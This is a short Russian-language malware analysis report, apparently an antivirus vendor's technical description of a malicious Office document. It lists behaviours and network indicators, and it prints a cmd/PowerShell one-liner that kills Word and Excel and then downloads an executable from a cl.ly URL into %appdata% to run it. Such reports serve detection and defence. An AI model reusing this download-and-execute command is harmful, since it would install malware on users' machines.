Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- “https://cl.ly/2g2d2d1x2a3o/download/tmp745.exe как “%appdata%\office.exe
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /F /IM WINWORD.EXE
- '<SYSTEM32>\taskkill.exe' /F /IM EXCEL.EXE
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "CMD /C TASKKILL /F /IM WINWORD.EXE & TASKKILL /F /IM EXCEL.EXE & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://cl.ly/2g2d2d1x2a3O/download/tmp745.exe”, “%APpdATa%\offic...
Сетевая активность
TCP
Запросы HTTP GET
- http://x.##2.us/x.cer
UDP
- DNS ASK cl.ly
- DNS ASK x.##2.us
- DNS ASK ap#.cld.me
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "CMD /C TASKKILL /F /IM WINWORD.EXE & TASKKILL /F /IM EXCEL.EXE & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://cl.ly/2g2d2d1x2a3O/download/tmp745.exe”, “%APpdATa%\offic...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C TASKKILL /F /IM WINWORD.EXE
